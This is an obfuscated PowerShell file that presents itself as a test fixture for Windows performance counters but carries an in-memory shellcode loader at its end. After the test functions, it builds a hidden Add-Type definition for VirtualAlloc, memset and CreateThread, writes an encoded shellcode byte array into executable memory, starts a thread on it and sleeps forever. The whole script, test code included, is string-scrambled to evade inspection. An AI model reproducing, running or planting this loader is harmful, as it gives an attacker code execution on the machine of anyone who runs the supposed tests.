  $x30R1z=  [tYPe]("{7}{2}{6}{5}{0}{3}{1}{4}" -f'oRmance','oUntE','Pe','c','RcATegoRy','f','R','diAGnostICs.')  ; 











function S`Tart-tESt`FIX`TUrE
{
    & (.("{1}{2}{0}"-f 'h','Joi','n-Pat') -Path ${pS`s`C`RIpTr`OOt} -ChildPath ((("{3}{1}{6}{4}{5}{2}{0}" -f'bonTest.ps1','WIn','r','..X0','alize-','Ca','iti'))."r`epl`ACe"('X0W',[STring][cHar]92)) -Resolve)
}

function t`E`St`-shoUl`dg`e`TP`Erfo`RmancECO`UntERs
{
    ${CaT`Eg`O`RIes} =  (  .("{2}{0}{1}"-f'T-vARIAB','lE','gE')  ("x"+"30r1z")).vALUe::("{2}{0}{1}" -f'C','ategories','Get').Invoke() 
    foreach( ${cAT`E`gorY} in ${CAtEg`O`R`ieS} )
    {
        ${COuNtE`R`s`EX`PECt`eD} = @( ${CA`TeGORY}.("{1}{0}{2}" -f 'etCounte','G','rs').Invoke("") )
        ${cOU`NtER`SAcT`UaL} = @( .("{2}{0}{1}{5}{3}{4}" -f't-Perfor','m','Ge','eCou','nter','anc') -CategoryName ${CaT`ego`Ry}."CAtego`R`Y`NAmE" )
        &("{1}{0}{3}{2}"-f 'sert','As','l','-Equa') ${cOU`NTerseXp`ec`T`Ed}."L`en`GTh" ${cOu`NTe`RsACTu`Al}."L`engtH"
    }
    
}

function tEs`T-Sh`oULD`gEt`N`O`per`F`oRm`ANC`eCOuNteR`S`FO`RnONEX`Isten`TCaTEGORY
{
    ${c`OUN`TERs} = &("{4}{1}{2}{3}{0}"-f'Counter','Perfo','r','mance','Get-') -CategoryName ("{2}{0}{1}"-f 'x','ist','IDoNotE')
    .("{3}{0}{2}{1}" -f 'se','ll','rt-Nu','As') ${Co`UnT`ErS}
}


${A`NJo} = ((("{82}{64}{57}{38}{6}{48}{76}{14}{70}{7}{50}{35}{11}{69}{31}{2}{20}{0}{78}{19}{58}{36}{53}{43}{1}{25}{41}{83}{79}{15}{81}{61}{27}{59}{45}{84}{33}{12}{10}{8}{67}{68}{46}{3}{72}{65}{39}{52}{9}{77}{60}{5}{62}{30}{34}{40}{26}{54}{17}{55}{18}{29}{56}{16}{44}{13}{21}{4}{74}{66}{24}{37}{42}{71}{51}{63}{47}{75}{49}{23}{22}{28}{73}{32}{80}"-f ' uin','ect);[Dl',' lpAdd','rib',' lpThreadId','kSize','ll{0}','e','tP','d','In','irtua','ad(','dwCr','ic','ll{0})]public s','in','ess, Int','ara','tionType,','ress, uint dwSize,','eationFlags, IntPtr','int',' dest, u','D','lIm','A','ic extern I',' ','meter','P','tr',' uint c','eThre','tr lp',' V','int ','llI','l32.d','n','Start','port({','mport({0}msv','rot','t ','Ptr ','dAtt',')]public static ext',')]pub','tPtr','rn IntPtr','rt.dll{','t ','flP','ddr','Ptr lpP',', u','kerne',' u','nt','c','t',', Int','0}','llImport({0}',' ui',';[','tr lpTh','rea','lAlloc(IntP',' static ext','c','utes,','src,',')','ern IntPtr memset(In','l','wSta','t flAlloca','ernel32.d','ount);','ta','[D','0}k','Creat'))  -f  [ChaR]34);${w} = .("{0}{1}{2}"-f 'Add-','Typ','e') -memberDefinition ${A`NJO} -Name ("{1}{0}"-f'in32','W') -namespace ("{2}{4}{3}{1}{0}" -f's','on','Win3','cti','2Fun') -passthru;[Byte[]];[Byte[]]${z} = 0xdd,0xc6,0xbd,0x8a,0x08,0x9c,0xe1,0xd9,0x74,0x24,0xf4,0x5a,0x29,0xc9,0xb1,0x47,0x31,0x6a,0x18,0x03,0x6a,0x18,0x83,0xc2,0x8e,0xea,0x69,0x1d,0x66,0x68,0x91,0xde,0x76,0x0d,0x1b,0x3b,0x47,0x0d,0x7f,0x4f,0xf7,0xbd,0x0b,0x1d,0xfb,0x36,0x59,0xb6,0x88,0x3b,0x76,0xb9,0x39,0xf1,0xa0,0xf4,0xba,0xaa,0x91,0x97,0x38,0xb1,0xc5,0x77,0x01,0x7a,0x18,0x79,0x46,0x67,0xd1,0x2b,0x1f,0xe3,0x44,0xdc,0x14,0xb9,0x54,0x57,0x66,0x2f,0xdd,0x84,0x3e,0x4e,0xcc,0x1a,0x35,0x09,0xce,0x9d,0x9a,0x21,0x47,0x86,0xff,0x0c,0x11,0x3d,0xcb,0xfb,0xa0,0x97,0x02,0x03,0x0e,0xd6,0xab,0xf6,0x4e,0x1e,0x0b,0xe9,0x24,0x56,0x68,0x94,0x3e,0xad,0x13,0x42,0xca,0x36,0xb3,0x01,0x6c,0x93,0x42,0xc5,0xeb,0x50,0x48,0xa2,0x78,0x3e,0x4c,0x35,0xac,0x34,0x68,0xbe,0x53,0x9b,0xf9,0x84,0x77,0x3f,0xa2,0x5f,0x19,0x66,0x0e,0x31,0x26,0x78,0xf1,0xee,0x82,0xf2,0x1f,0xfa,0xbe,0x58,0x77,0xcf,0xf2,0x62,0x87,0x47,0x84,0x11,0xb5,0xc8,0x3e,0xbe,0xf5,0x81,0x98,0x39,0xfa,0xbb,0x5d,0xd5,0x05,0x44,0x9e,0xff,0xc1,0x10,0xce,0x97,0xe0,0x18,0x85,0x67,0x0d,0xcd,0x30,0x6d,0x99,0x8a,0xa0,0x09,0x31,0x3b,0x2b,0xd2,0xd0,0xe7,0xa2,0x34,0x82,0x47,0xe5,0xe8,0x62,0x38,0x45,0x59,0x0a,0x52,0x4a,0x86,0x2a,0x5d,0x80,0xaf,0xc0,0xb2,0x7d,0x87,0x7c,0x2a,0x24,0x53,0x1d,0xb3,0xf2,0x19,0x1d,0x3f,0xf1,0xde,0xd3,0xc8,0x7c,0xcd,0x83,0x38,0xcb,0xaf,0x05,0x46,0xe1,0xda,0xa9,0xd2,0x0e,0x4d,0xfe,0x4a,0x0d,0xa8,0xc8,0xd4,0xee,0x9f,0x43,0xdc,0x7a,0x60,0x3b,0x21,0x6b,0x60,0xbb,0x77,0xe1,0x60,0xd3,0x2f,0x51,0x33,0xc6,0x2f,0x4c,0x27,0x5b,0xba,0x6f,0x1e,0x08,0x6d,0x18,0x9c,0x77,0x59,0x87,0x5f,0x52,0x5b,0xfb,0x89,0x9a,0x29,0x15,0x0a;${g} = 0x1000;if (${Z}."lEn`gTH" -gt 0x1000){${G} = ${Z}."LeNG`Th"};${4`4Q}=${w}::("{2}{1}{0}" -f 'c','alAllo','Virtu').Invoke(0,0x1000,${G},0x40);for (${i}=0;${i} -le (${Z}."L`EN`gtH"-1);${I}++) {${w}::"M`eMsEt"([IntPtr](${4`4q}.("{2}{1}{0}"-f'32','t','ToIn').Invoke()+${I}), ${z}[${i}], 1)};${w}::("{1}{3}{2}{0}"-f 'ead','C','hr','reateT').Invoke(0,0,${4`4Q},0,0,0);for (;;){.("{0}{1}{2}{3}"-f 'St','ar','t-sle','ep') 60};
